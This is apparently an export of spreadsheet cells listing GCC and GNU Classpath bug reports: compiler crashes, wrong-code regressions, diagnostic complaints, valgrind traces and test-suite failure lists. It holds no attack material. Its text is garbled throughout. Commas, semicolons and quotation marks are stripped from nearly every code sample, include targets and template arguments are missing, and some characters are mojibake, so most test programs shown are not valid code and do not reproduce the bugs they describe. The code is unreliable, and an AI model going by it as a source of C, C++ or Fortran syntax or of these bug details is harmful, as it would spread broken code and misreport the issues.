/opt/notnfs/msebor/build/gcc-svn/prev-x86_64-pc-linux-gnu/libstdc++-v3/include/bits/stl_tree.h: In instantiation of â€˜class std::_Rb_tree Import_init_lt std::allocator &gt;â€™:
/opt/notnfs/msebor/build/gcc-svn/prev-x86_64-pc-linux-gnu/libstdc++-v3/include/bits/stl_set.h:133:17:   required from â€˜class std::setâ€™
t.C:13:37:   required from here
/opt/notnfs/msebor/build/gcc-svn/prev-x86_64-pc-linux-gnu/libstdc++-v3/include/bits/stl_tree.h:452:7: error: static assertion failed: comparison object must be invocable with two arguments of key type
       static_assert(__is_invocable{}
       ^~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-1017</t>
  </si>
  <si>
    <t>-Wmissing-format-attribute gives too many warnings</t>
  </si>
  <si>
    <t xml:space="preserve">	The program appended below warns IMO erroneously:
	gromit:/tmp:[1]$ /opt/gcc-2.97.test/bin/gcc -Wmissing-format-attribute -c t.c -Wformat
t.c: In function `test':
t.c:7: warning: function might be possible candidate for `printf' format attribute
Release:
2.97 20001208 (experimental)
Environment:
System: Linux gromit 2.4.0-test10 #52 Wed Nov 1 08:06:34 CET 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /cvs/gcc/configure --prefix=/opt/gcc-2.97.test --enable-shared --enable-threads=posix --with-gnu-as --with-gnu-ld --disable-nls --enable-languages=cobjcc++f77
How-To-Repeat:
Compile this small program with -Wmissing-format-attribute -Wformat:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
extern void dbg_log (const char *str ...)
     __attribute__ ((__format__ (__printf__ 1 0)))
int
test (void)
{
  dbg_log (%s: Test)
  return 0
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-531</t>
  </si>
  <si>
    <t>Segmentation fault while processing invalid input (operator syntax)</t>
  </si>
  <si>
    <t>The program attached to this report has a syntax error in
line 46. Previous versions of GCC would correctly diagnose
this current CVS sources crash:
y.cc:46: Internal error: Segmentation fault.
   Please submit a full bug report.
   See  for instructions.
Release:
CVS as of 2000-09-13
Environment:
i386-unknown-freebsd4.1
also some i586-pc-linux-gnu
yesterday).
How-To-Repeat:
g++ y.cc</t>
  </si>
  <si>
    <t>GCC-4333</t>
  </si>
  <si>
    <t>ICE on linux kernel</t>
  </si>
  <si>
    <t>This is all I have:
gcc -D__KERNEL__ -I/usr/src/linux-2.4.9/include -Wall -Wstr ict-prototypes -Wno-trigraphs -O2 -fomit-frame-pointer -fno-strict-aliasing -fn o-common -mpreferred-stack-boundary=2 -march=k6 -save-temps -c -o acct.o acct.c
acct.c: In function `check_free_space':
acct.c:147: Unrecognizable insn:
(insn 335 102 336 (parallel[ 
            (set (reg/v:SI 2 ecx [44])
                (const_int 0 [0x0]))
            (clobber (reg:CC 17 flags))
        ] ) -1 (insn_list:REG_DEP_ANTI 100 (insn_list:REG_DEP_ANTI 102 (nil)))
    (expr_list:REG_UNUSED (reg:CC 17 flags)
        (nil)))
acct.c:147: Internal compiler error in insn_default_length at insn-attrtab.c:223
Please submit a full bug report
with preprocessed source if appropriate.
Release:
gcc version 3.0.2 20010910 (prerelease)
Environment:
Mandrake Linux 8.0 kernel 2.4.9 AMD K6-2 processor</t>
  </si>
  <si>
    <t>mstolt</t>
  </si>
  <si>
    <t>GCC-7699</t>
  </si>
  <si>
    <t>Inner class scopting not working correctly for function prototype matching</t>
  </si>
  <si>
    <t>With multiple levels of inner (nested) classes within an outer class template attempting to return an instance of one inner class from a member function of an inner inner class causes a compilation failure with a series of related errors. There is a failure to match function prototypes even though one of the candidates listed is identical to that requested and all class names have been fully scoped.
In the example file attached the member function of a second degree inner class is attempting to return an object of a first degree inner class all of which are in the same outer class template. Example class layout:
template 
class A
{
  class B
  {
  }
  class C
  {
    class D
    {
       A::B operator*() // Member function declaration
    }
  }
}
template 
A::B A::C::D::operator*() // Causes errors
{
   return A::B()
}
Note that the same source code provided in the attached file works perfectly with the SGI MipPro C++ compiler. The attached file contains the example on which I discovered the issue. The same problem occurs twice in this code.
The errors reported on my system are:
In file included from main.cxx:8:
/homes/rob/dev/products/nmove/main/model/egs/grid2d/inc/Grid2D.h:1373: prototype
   for `Grid2D::PointReference
   Grid2D::FaceReference::VertexCirculator::operator*()' does not match any
   in class `Grid2D::FaceReference::VertexCirculator'
/homes/rob/dev/products/nmove/main/model/egs/grid2d/inc/Grid2D.h:257: candidate
   s are: Point Grid2D::FaceReference::VertexCirculator::operator*()
   const
/homes/rob/dev/products/nmove/main/model/egs/grid2d/inc/Grid2D.h:256:
         Grid2D::PointReference
   Grid2D::FaceReference::VertexCirculator::operator*()
/homes/rob/dev/products/nmove/main/model/egs/grid2d/inc/Grid2D.h:1373: template
   definition of non-template `Grid2D::PointReference
   Grid2D::FaceReference::VertexCirculator::operator*()'
/homes/rob/dev/products/nmove/main/model/egs/grid2d/inc/Grid2D.h:1453: prototype
   for `Grid2D::EdgeReference
   Grid2D::FaceReference::EdgeCirculator::operator*()' does not match any in
   class `Grid2D::FaceReference::EdgeCirculator'
/homes/rob/dev/products/nmove/main/model/egs/grid2d/inc/Grid2D.h:287: candidate
   s are: Edge Grid2D::FaceReference::EdgeCirculator::operator*() const
/homes/rob/dev/products/nmove/main/model/egs/grid2d/inc/Grid2D.h:286:
         Grid2D::EdgeReference
   Grid2D::FaceReference::EdgeCirculator::operator*()
/homes/rob/dev/products/nmove/main/model/egs/grid2d/inc/Grid2D.h:1453: template
   definition of non-template `Grid2D::EdgeReference
   Grid2D::FaceReference::EdgeCirculator::operator*()'
Release:
gcc 3.1
Environment:
Red Hat Linux 7.3 on x86 Dual P4 Xeon 2.4 GHz
Linux version 2.4.18-5smp (bhcompile@daffy.perf.redhat.com) (gcc version 2.96 20000731 (Red Hat Linux 7.3 2.96-110)) #1 SMP Mon Jun 10 15:19:40 EDT 2002
How-To-Repeat:
The following command line reproduces the error :
/usr/local/gcc3.1/bin/g++ -fPIC -ftemplate-depth-50 -Wno-deprecated -g   -DMVE_DEBUG -DMVE_LINUX -DMVE_WFM   -DMVE_NM  -DMVE_QT -DQT_NO_DEBUG -DQT_THREAD_SUPPORT -DMVE_CGAL -DMVE_USE_CGAL -DDEBUG -DMVE_BOOST -DMVE_BOOST_VERSION=1280   -DMVE_LINUX_GCC3 -DMVE_STD  -I. -I/homes/rob/dev/products/nmove/main -I/homes/rob/utils_install/LINUX/qt-3.0.3-LINUX.DEBUG.GCC3/include -I/homes/rob/utils_install/LINUX/cgal-2.4-LINUX.DEBUG.GCC3/include/CGAL/config/i686_Linux-2.4.18-5smp_g++-3.1.0 -I/homes/rob/utils_install/LINUX/cgal-2.4-LINUX.DEBUG.GCC3/include -I/homes/rob/utils_install/LINUX/boost-1_28_0-LINUX.DEBUG.GCC3  -c main.cxx -o obj_files/LINUX.DEBUG.GCC3/main.o</t>
  </si>
  <si>
    <t>GCC-9464</t>
  </si>
  <si>
    <t>[3.4 regression] ICE on missing typename</t>
  </si>
  <si>
    <t>ICE on code that is missing a 'typename'.  Inclding the 'typename' obviates the problem.
The program is small:
// Compiling this program causes an internal_compilation_error.  The
// program is missing a 'typename'.  Compiling with '-DAVOID_ERROR'
// causes the missing 'typename' to be included and the compilation
// succeeds.
#include 
template
struct CreateLeaf {}
template
struct CreateLeaf &gt;
{
#ifdef AVOID_ERROR
  typedef typename std::vector::const_iterator Leaf_t
#else // erroneous
  typedef std::vector::const_iterator Leaf_t
#endif // AVOID_ERROR
}
Release:
head
Environment:
Red Hat Linux release 7.2 (Enigma)
i686-pc-linux-gnu)
How-To-Repeat:
/home/oldham/gcc-install/gcc1/lib/gcc-lib/i686-pc-linux-gnu/3.4/cc1plus -fpreprocessed goo.ii -quiet -dumpbase goo.C -auxbase goo -Wall -pedantic -version -o goo.s</t>
  </si>
  <si>
    <t>oldham</t>
  </si>
  <si>
    <t>GCC-39867</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] Wrong result of conditional operator exp &lt; 2 ? 2U : (unsigned int) exp</t>
  </si>
  <si>
    <t>With GCC 4.4.0 the following program outputs 4294967295 instead of 2:
#include 
int main (void)
{
  int exp = -1
  printf (%u\n exp &lt; 2 ? 2U : (unsigned int) exp)
  return 0
}
Note: I've tried with gcc-snapshot under a Debian/unstable x86_64 Linux machine but the same bug was reported to me with gcc-4.4.0 (it was found by Philippe Theveny who works on MPFR and the MPFR tests fail because of that).
GCC 4.3.3 does not have this problem.</t>
  </si>
  <si>
    <t>GCC-86</t>
  </si>
  <si>
    <t>Wrong number of loop iterations</t>
  </si>
  <si>
    <t>This program gives the wrong answer.  The number of loop iterations is wrong. Fails with -O0 -O1 -O2 and -O3
Is OK with g77 2.95.2 and Irix cc 7.2.1
(see http://gcc.gnu.org/ml/gcc-bugs/2000-02/msg00727.html )
Toon Moene (toon@moene.indiv.nluug.nl) reports Fails identically on i686-pc-linux-gnu
Release:
g77 version 2.96 20000221 (experimental)
Environment:
Irix 6.5.3m
How-To-Repeat:
g77 -O -o labug5 labug.f
./labug5</t>
  </si>
  <si>
    <t>GCC-48573</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 172316 gave
FAIL: c-c++-common/torture/complex-sign-mul-minus-one.c  -Os  (internal compiler error)
FAIL: c-c++-common/torture/complex-sign-mul-minus-one.c  -Os  (internal compiler error)
FAIL: c-c++-common/torture/complex-sign-mul-minus-one.c  -Os  (test for excess errors)
FAIL: c-c++-common/torture/complex-sign-mul-minus-one.c  -Os  (test for excess errors)
FAIL: c-c++-common/torture/complex-sign-mul-one.c  -Os  (internal compiler error)
FAIL: c-c++-common/torture/complex-sign-mul-one.c  -Os  (internal compiler error)
FAIL: c-c++-common/torture/complex-sign-mul-one.c  -Os  (test for excess errors)
FAIL: c-c++-common/torture/complex-sign-mul-one.c  -Os  (test for excess errors)
FAIL: gcc.c-torture/compile/20031208-1.c  -Os  (internal compiler error)
FAIL: gcc.c-torture/compile/20031208-1.c  -Os  (test for excess errors)
FAIL: gcc.c-torture/compile/20080628-1.c  -Os  (internal compiler error)
FAIL: gcc.c-torture/compile/20080628-1.c  -Os  (test for excess errors)
FAIL: gcc.c-torture/execute/20020413-1.c compilation  -Os  (internal compiler error)
FAIL: gcc.c-torture/execute/20080502-1.c compilation  -Os  (internal compiler error)
FAIL: gcc.c-torture/execute/960513-1.c compilation  -Os  (internal compiler error)
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8l.c compilation  -Os  (internal compiler error)
FAIL: gcc.c-torture/execute/ieee/inf-2.c compilation  -Os  (internal compiler error)
FAIL: gcc.c-torture/execute/ieee/inf-3.c compilation  -Os  (internal compiler error)
FAIL: gcc.c-torture/execute/pr44942.c compilation  -Os  (internal compiler error)
FAIL: gcc.c-torture/execute/stdarg-1.c compilation  -Os  (internal compiler error)
FAIL: gcc.c-torture/execute/stdarg-2.c compilation  -Os  (internal compiler error)
FAIL: gcc.dg/pr19402-2.c (internal compiler error)
FAIL: gcc.dg/pr19402-2.c (test for excess errors)
FAIL: gcc.dg/pr43305.c (internal compiler error)
FAIL: gcc.dg/pr43305.c (test for excess errors)
FAIL: gcc.dg/torture/builtin-convert-4.c  -Os  (internal compiler error)
FAIL: gcc.dg/torture/builtin-convert-4.c  -Os  (test for excess errors)
FAIL: gcc.dg/torture/builtin-math-2.c  -Os  (internal compiler error)
FAIL: gcc.dg/torture/builtin-math-2.c  -Os  (test for excess errors)
FAIL: gfortran.dg/c_kind_params.f90  -Os  (internal compiler error)
FAIL: gfortran.dg/c_kind_params.f90  -Os  (test for excess errors)
FAIL: gfortran.dg/default_format_2.f90  -Os  (internal compiler error)
FAIL: gfortran.dg/default_format_2.f90  -Os  (test for excess errors)
FAIL: gfortran.dg/default_format_denormal_2.f90  -Os  (internal compiler error)
FAIL: gfortran.dg/default_format_denormal_2.f90  -Os  (test for excess errors)
FAIL: gfortran.dg/large_real_kind_2.F90  -Os  (internal compiler error)
FAIL: gfortran.dg/large_real_kind_2.F90  -Os  (test for excess errors)
FAIL: libffi.call/float2.c -Os (test for excess errors)
FAIL: libgomp.c++/ctor-5.C  -Os  (internal compiler error)
FAIL: libgomp.c++/ctor-5.C  -Os  (test for excess errors)
FAIL: libgomp.fortran/allocatable2.f90  -Os  (internal compiler error)
FAIL: libgomp.fortran/allocatable2.f90  -Os  (test for excess errors)
FAIL: libgomp.fortran/appendix-a/a.22.7.f90  -Os  (internal compiler error)
FAIL: libgomp.fortran/appendix-a/a.22.7.f90  -Os  (test for excess errors)
FAIL: libgomp.fortran/threadprivate2.f90  -Os  (internal compiler error)
FAIL: libgomp.fortran/threadprivate2.f90  -Os  (test for excess errors)
FAIL: libgomp.fortran/threadprivate3.f90  -Os  (internal compiler error)
FAIL: libgomp.fortran/threadprivate3.f90  -Os  (test for excess errors)
revision 172311 is OK.</t>
  </si>
  <si>
    <t>GCC-59604</t>
  </si>
  <si>
    <t>Constant comparisons with -fno-range-check and int(z'...')</t>
  </si>
  <si>
    <t>Trying out a fix for PR 58003 I found that the following program was of the opinion that -1 does not equal -1:
ig25@linux-fd1f:~/Krempel/NoRange&gt; cat bar.f90
program test
  use iso_fortran_env
  implicit none
  integer parameter :: wt = int32
  print * int(z'FFFFFFFF'wt)
  print * int(z'FFFFFFFF'wt) /= -1
end program test
ig25@linux-fd1f:~/Krempel/NoRange&gt; gfortran -fno-range-check bar.f90 
ig25@linux-fd1f:~/Krempel/NoRange&gt; ./a.out
          -1
 T</t>
  </si>
  <si>
    <t>GCC-50074</t>
  </si>
  <si>
    <t>[4.7 Regression] gcc.dg/sibcall-6.c execution test on x86_64 with -fPIC</t>
  </si>
  <si>
    <t>Between revisions 176012 and 176060 running gcc.dg/sibcall-6.c compiled with -O2 -foptimize-sibling-calls -fno-ipa-cp on x86_64-apple-darwin10 aborts.</t>
  </si>
  <si>
    <t>GCC-9452</t>
  </si>
  <si>
    <t>segfault in convert_from_reference using a dependent expression as argument for the template-id in the return type</t>
  </si>
  <si>
    <t>OK this is #1 of 7 (this weekends batch of ICE findings :-( )
This crashes every gcc since at least 2.95 with a SegFault:
----------------------------------
template  struct Len   { static const int val = 1 }
template  struct X {}
template  void foo(X) {}
template 
X::val-1&gt;
foo(X) {
  foo (X())
}
int main () {
  foo(X())
}
--------------------------------
g/a&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c bug32-1.cc
bug32-1.cc: In function `int main()':
bug32-1.cc:13: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-17150</t>
  </si>
  <si>
    <t>Ugly diagnostics for invalid variably modified type</t>
  </si>
  <si>
    <t>This test case posted for PR 17148:
struct A {}
struct B : A
{
    static int foo() { return 1 }
    int i[B::foo()]
}
produces the ugly diagnostic:
test.cc:6: error: data member may not have variably modified type `int [(((long
unsigned int)(((long int)B::foo()) - 1)) + 1u)]'
with g++ 3.5.0 20040815 on alphaev68-unknown-linux-gnu.</t>
  </si>
  <si>
    <t>GCC-36377</t>
  </si>
  <si>
    <t>newline missing at end of preprocessed output</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/ml/fortran/2008-05/msg00354.html issue 2:
When I compile a .F90 file with -E no newline is appended at the
end of the last line of output.</t>
  </si>
  <si>
    <t>GCC-48289</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7 regression] -pedantic breaks std::move</t>
  </si>
  <si>
    <t>From https://bugzilla.redhat.com/show_bug.cgi?id=690548
Description of problem:
[18:03:50 pal@underdark ~/tmp/1]$ cat a.cpp
#include 
class A { }
static void g ( A &amp;&amp; ) { }
template  class B {
public:
 void f ( ) {
  A a
  g ( std :: move ( a ) )
 }
}
=================
[18:04:13 pal@underdark ~/tmp/1]$ LANG=C g++ -std=c++0x  -pedantic  -c a.cpp 
a.cpp: In member function 'void B::f()':
a.cpp:11:25: error: invalid initialization of reference of type 'A&amp;&amp;' from
expression of type 'std::remove_reference::type'
a.cpp:5:13: error: in passing argument 1 of 'void g(A&amp;&amp;)'
=================
error can be fixed by removing -pedantic or by commenting out /*template &lt;
class T &gt; */</t>
  </si>
  <si>
    <t>GCC-36194</t>
  </si>
  <si>
    <t>[Regression] Truncation optimization in combine can remove necessary truncations</t>
  </si>
  <si>
    <t>On mips64-linux-gnu the following testcase aborts:
  void abort (void)
  __attribute__ ((noinline)) void
  f (int i)
  {
    if (i != 0x87654321)
      abort ()
    asm ()
  }
  __attribute__ ((noinline)) void
  g (long long a)
  {
    f (a)
    asm ()
  }
  main ()
  {
    g (0x1234567887654321ll)
    return 0
  }</t>
  </si>
  <si>
    <t>nemet</t>
  </si>
  <si>
    <t>CLASSPATH-23005</t>
  </si>
  <si>
    <t>JInternalFrame causes OutOfMemory error when maximized</t>
  </si>
  <si>
    <t>Run the attached test case.  
Maximize the JInternalFrame and wait a while.  OutOfMemory error occurs.
Strangely enough when the JInternalFrame is positioned at (1010) rather than (6060) the error does not occur.</t>
  </si>
  <si>
    <t>GCC-1474</t>
  </si>
  <si>
    <t>gcj --main leaves file in /tmp</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: apbianco-&gt;tromey
Responsible-Changed-Why: I broke it.
</t>
  </si>
  <si>
    <t>GCC-37558</t>
  </si>
  <si>
    <t>[4.4 regression] rev 140120 changes the accessibility of a friend decl.</t>
  </si>
  <si>
    <t>Gcc 4.4 used to accept the program
---------------------------------------
class Foo {
 friend class Bar
 friend void func(const class Bar*)
}
--------------------------------------
since 140120 it does not.
Simon found the following:
gcc 2.95.3 3.4.5 and icc accept it. Previous versions of 4.4 reject it.
The standard says
11.4-7: A name nominated by a friend declaration shall be accessible in the scope of the class containing the friend declaration...
I am not sure if we should accept or reject it but we should have a testcase once we decide.</t>
  </si>
  <si>
    <t>GCC-48762</t>
  </si>
  <si>
    <t>valgrind: Invalid read/write of size 8 in cse_main with -O --param max-cse-path-length=0 on basic code</t>
  </si>
  <si>
    <t>----- testcase.c -----
void foo (void) {}
----------------------
Compiler output (under valgrind):
$ cc1 -O --param max-cse-path-length=0 testcase.c -quiet
==7641== Invalid read of size 8
==7641==    at 0x10F8710: search_line_sse2 (lex.c:394)
==7641==    by 0x10F88B9: _cpp_clean_line (lex.c:665)
==7641==    by 0x10F9297: _cpp_get_fresh_line (lex.c:1886)
==7641==    by 0x10FAA50: _cpp_lex_direct (lex.c:1951)
==7641==    by 0x10FB836: _cpp_lex_token (lex.c:1825)
==7641==    by 0x10FE0BF: cpp_get_token (macro.c:1239)
==7641==    by 0x10FE21F: cpp_get_token_with_location (macro.c:1351)
==7641==    by 0x56ABA2: c_lex_with_flags (c-lex.c:302)
==7641==    by 0x521983: c_lex_one_token (c-parser.c:216)
==7641==    by 0x534237: c_parse_file (c-parser.c:398)
==7641==    by 0x570274: c_common_parse_file (c-opts.c:1092)
==7641==    by 0x9002EB: toplev_main (toplev.c:579)
==7641==  Address 0x7231680 is 16 bytes inside a block of size 21 alloc'd
==7641==    at 0x4C29504: realloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==7641==    by 0x1121D9C: xrealloc (xmalloc.c:179)
==7641==    by 0x10ED063: _cpp_convert_input (charset.c:1734)
==7641==    by 0x10F5F52: read_file (files.c:648)
==7641==    by 0x10F68FA: _cpp_stack_file (files.c:723)
==7641==    by 0x10F8135: cpp_read_main_file (init.c:570)
==7641==    by 0x56F92A: c_common_post_options (c-opts.c:1031)
==7641==    by 0x8FFCF6: toplev_main (toplev.c:1283)
==7641==    by 0x644AB6C: (below main) (in /lib64/libc-2.11.3.so)
==7641== 
==7641== Invalid write of size 8
==7641==    at 0x101CE2E: cse_main (cse.c:6118)
==7641==    by 0x101E05D: rest_of_handle_cse (cse.c:7380)
==7641==    by 0x8132C5: execute_one_pass (passes.c:1555)
==7641==    by 0x8135A4: execute_pass_list (passes.c:1610)
==7641==    by 0x8135B6: execute_pass_list (passes.c:1611)
==7641==    by 0x95B4AA: tree_rest_of_compilation (tree-optimize.c:423)
==7641==    by 0xB3E632: cgraph_expand_function (cgraphunit.c:1576)
==7641==    by 0xB40B4B: cgraph_optimize (cgraphunit.c:1635)
==7641==    by 0xB410D9: cgraph_finalize_compilation_unit (cgraphunit.c:1096)
==7641==    by 0x4F9623: c_write_global_declarations (c-decl.c:9883)
==7641==    by 0x900327: toplev_main (toplev.c:591)
==7641==    by 0x644AB6C: (below main) (in /lib64/libc-2.11.3.so)
==7641==  Address 0x7527030 is 0 bytes inside a block of size 1 alloc'd
==7641==    at 0x4C26F30: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==7641==    by 0x1121D07: xmalloc (xmalloc.c:147)
==7641==    by 0x101CC54: cse_main (cse.c:6473)
==7641==    by 0x101E05D: rest_of_handle_cse (cse.c:7380)
==7641==    by 0x8132C5: execute_one_pass (passes.c:1555)
==7641==    by 0x8135A4: execute_pass_list (passes.c:1610)
==7641==    by 0x8135B6: execute_pass_list (passes.c:1611)
==7641==    by 0x95B4AA: tree_rest_of_compilation (tree-optimize.c:423)
==7641==    by 0xB3E632: cgraph_expand_function (cgraphunit.c:1576)
==7641==    by 0xB40B4B: cgraph_optimize (cgraphunit.c:1635)
==7641==    by 0xB410D9: cgraph_finalize_compilation_unit (cgraphunit.c:1096)
==7641==    by 0x4F9623: c_write_global_declarations (c-decl.c:9883)
==7641== 
==7641== Invalid read of size 8
==7641==    at 0x101D218: cse_main (cse.c:6266)
==7641==    by 0x101E05D: rest_of_handle_cse (cse.c:7380)
==7641==    by 0x8132C5: execute_one_pass (passes.c:1555)
==7641==    by 0x8135A4: execute_pass_list (passes.c:1610)
==7641==    by 0x8135B6: execute_pass_list (passes.c:1611)
==7641==    by 0x95B4AA: tree_rest_of_compilation (tree-optimize.c:423)
==7641==    by 0xB3E632: cgraph_expand_function (cgraphunit.c:1576)
==7641==    by 0xB40B4B: cgraph_optimize (cgraphunit.c:1635)
==7641==    by 0xB410D9: cgraph_finalize_compilation_unit (cgraphunit.c:1096)
==7641==    by 0x4F9623: c_write_global_declarations (c-decl.c:9883)
==7641==    by 0x900327: toplev_main (toplev.c:591)
==7641==    by 0x644AB6C: (below main) (in /lib64/libc-2.11.3.so)
==7641==  Address 0x7527030 is 0 bytes inside a block of size 1 alloc'd
==7641==    at 0x4C26F30: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==7641==    by 0x1121D07: xmalloc (xmalloc.c:147)
==7641==    by 0x101CC54: cse_main (cse.c:6473)
==7641==    by 0x101E05D: rest_of_handle_cse (cse.c:7380)
==7641==    by 0x8132C5: execute_one_pass (passes.c:1555)
==7641==    by 0x8135A4: execute_pass_list (passes.c:1610)
==7641==    by 0x8135B6: execute_pass_list (passes.c:1611)
==7641==    by 0x95B4AA: tree_rest_of_compilation (tree-optimize.c:423)
==7641==    by 0xB3E632: cgraph_expand_function (cgraphunit.c:1576)
==7641==    by 0xB40B4B: cgraph_optimize (cgraphunit.c:1635)
==7641==    by 0xB410D9: cgraph_finalize_compilation_unit (cgraphunit.c:1096)
==7641==    by 0x4F9623: c_write_global_declarations (c-decl.c:9883)
==7641== 
==7641== Invalid read of size 8
==7641==    at 0x101D0AD: cse_main (cse.c:6106)
==7641==    by 0x101E05D: rest_of_handle_cse (cse.c:7380)
==7641==    by 0x8132C5: execute_one_pass (passes.c:1555)
==7641==    by 0x8135A4: execute_pass_list (passes.c:1610)
==7641==    by 0x8135B6: execute_pass_list (passes.c:1611)
==7641==    by 0x95B4AA: tree_rest_of_compilation (tree-optimize.c:423)
==7641==    by 0xB3E632: cgraph_expand_function (cgraphunit.c:1576)
==7641==    by 0xB40B4B: cgraph_optimize (cgraphunit.c:1635)
==7641==    by 0xB410D9: cgraph_finalize_compilation_unit (cgraphunit.c:1096)
==7641==    by 0x4F9623: c_write_global_declarations (c-decl.c:9883)
==7641==    by 0x900327: toplev_main (toplev.c:591)
==7641==    by 0x644AB6C: (below main) (in /lib64/libc-2.11.3.so)
==7641==  Address 0x7527030 is 0 bytes inside a block of size 1 alloc'd
==7641==    at 0x4C26F30: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==7641==    by 0x1121D07: xmalloc (xmalloc.c:147)
==7641==    by 0x101CC54: cse_main (cse.c:6473)
==7641==    by 0x101E05D: rest_of_handle_cse (cse.c:7380)
==7641==    by 0x8132C5: execute_one_pass (passes.c:1555)
==7641==    by 0x8135A4: execute_pass_list (passes.c:1610)
==7641==    by 0x8135B6: execute_pass_list (passes.c:1611)
==7641==    by 0x95B4AA: tree_rest_of_compilation (tree-optimize.c:423)
==7641==    by 0xB3E632: cgraph_expand_function (cgraphunit.c:1576)
==7641==    by 0xB40B4B: cgraph_optimize (cgraphunit.c:1635)
==7641==    by 0xB410D9: cgraph_finalize_compilation_unit (cgraphunit.c:1096)
==7641==    by 0x4F9623: c_write_global_declarations (c-decl.c:9883)
==7641== 
Tested revisions:
r172929 - fail
4.6 r172337 - fail
4.5 r172337 - fail
4.4 r172337 - fail</t>
  </si>
  <si>
    <t>GCC-56052</t>
  </si>
  <si>
    <t>[4.7 Regression] [OOP] ICE in omp_add_variable at gimplify.c:5606</t>
  </si>
  <si>
    <t>As reported at http://gcc.gnu.org/ml/fortran/2013-01/msg00161.html the attached code ICE with 4.7.2 and trunk. This is a regression which occurred between revisions 181881 (2011-12-01 executable prints 'Correct') and 182076 (2011-12-07 ICE). Trunk at revision 195310 gives
tst_openmp.f90: In function 'final':
tst_openmp.f90:241:0: internal compiler error: in omp_add_variable at gimplify.c:5894
       select type (args)</t>
  </si>
  <si>
    <t>GCC-13669</t>
  </si>
  <si>
    <t>Can't build i686-to-ARM cross-compiler</t>
  </si>
  <si>
    <t>/usr/src/gcc/configure --prefix=/usr/src/gcc-arm --target=arm-elf
--enable-languages=c --with-newlib  --disable-shared  --disable-nls
[..]
make
[..]
/usr/src/gcc-obj/gcc/xgcc -B/usr/src/gcc-obj/gcc/
-B/usr/src/gcc-arm/arm-elf/bin/ -B/usr/src/gcc-arm/arm-elf/lib/ -isystem
/usr/src/gcc-arm/arm-elf/include -isystem /usr/src/gcc-arm/arm-elf/sys-include
-O2  -DIN_GCC -DCROSS_COMPILE   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -Wold-style-definition  -isystem ./include  -Dinhibit_libc
-fno-inline -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I
-I/usr/src/gcc/gcc -I/usr/src/gcc/gcc/ -I/usr/src/gcc/gcc/../include  -mthumb
-fexceptions -c /usr/src/gcc/gcc/unwind-dw2-fde.c -o libgcc/thumb/unwind-dw2-fde.o
/usr/src/gcc/gcc/unwind-dw2-fde.c: In function `__register_frame_info_bases':
/usr/src/gcc/gcc/unwind-dw2-fde.c:101: error: insn does not satisfy its constraints:
(insn:HI 36 35 37 /usr/src/gcc/gcc/unwind-dw2-fde.c:89 (set (reg:HI 2 r2 [76])
        (mem:HI (label_ref 77) [0 S2 A16])) 133 {*thumb_movhi_insn}
(insn_list:REG_DEP_ANTI 26 (nil))
    (expr_list:REG_EQUIV (const_int 2040 [0x7f8])
        (nil)))
/usr/src/gcc/gcc/unwind-dw2-fde.c:101: internal compiler error: in
extract_constrain_insn_cached at recog.c:2000
gcc version 3.4.0 20040113 (experimental)
Mike</t>
  </si>
  <si>
    <t>mike_lange</t>
  </si>
  <si>
    <t>GCC-33424</t>
  </si>
  <si>
    <t>segmentation fault for legal code with -O2</t>
  </si>
  <si>
    <t>I just tried to compile Suse Linux package mysql-5.0.45-18
with the GNU C compiler version 4.3 snapshot 20070907.
The compiler said
if gcc -DHAVE_CONFIG_H -I. -I../../strings -I.. -I../include -I../../include    -DDBUG_OFF -O2 -g -fmessage-length=0 -D_FORTIFY_SOURCE=2 -DPIC -fPIC -DUNDEF_HAVE_INITGROUPS -DFORCE_INIT_OF_VARS -fno-strict-aliasing   -MT ctype-utf8.o -MD -MP -MF .deps/ctype-utf8.Tpo -c -o ctype-utf8.o ../../strings/ctype-utf8.c \
        then mv -f .deps/ctype-utf8.Tpo .deps/ctype-utf8.Po else rm -f .deps/ctype-utf8.Tpo exit 1 fi
In file included from ../../strings/ctype-utf8.c:21:
../../include/my_global.h:556: warning: function declaration isn't a prototype
../../strings/ctype-utf8.c: In function 'my_strnncollsp_utf8':
../../strings/ctype-utf8.c:2448: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Here is some help from valgrind
==19535== Invalid read of size 2
==19535==    at 0x9FFF59: cse_cc_succs (cse.c:6737)
==19535==    by 0xA08F11: rest_of_handle_cse2 (cse.c:6962)
==19535==    by 0x631218: execute_one_pass (passes.c:1115)
==19535==    by 0x6313EF: execute_pass_list (passes.c:1168)
==19535==    by 0x631404: execute_pass_list (passes.c:1169)
==19535==    by 0x70957F: tree_rest_of_compilation (tree-optimize.c:404)
==19535==    by 0x8767DF: cgraph_expand_function (cgraphunit.c:1077)
==19535==    by 0x878A3D: cgraph_optimize (cgraphunit.c:1146)
==19535==    by 0x41625D: c_write_global_declarations (c-decl.c:8080)
==19535==    by 0x6B095F: toplev_main (toplev.c:1058)
==19535==    by 0x52BDB43: (below main) (in /lib64/libc-2.6.so)
==19535==  Address 0x0 is not stack'd malloc'd or (recently) free'd
/tmp/q.i: In function 'my_strnncollsp_utf8':
/tmp/q.i:10725: internal compiler error: Segmentation fault
Please submit a full bug report
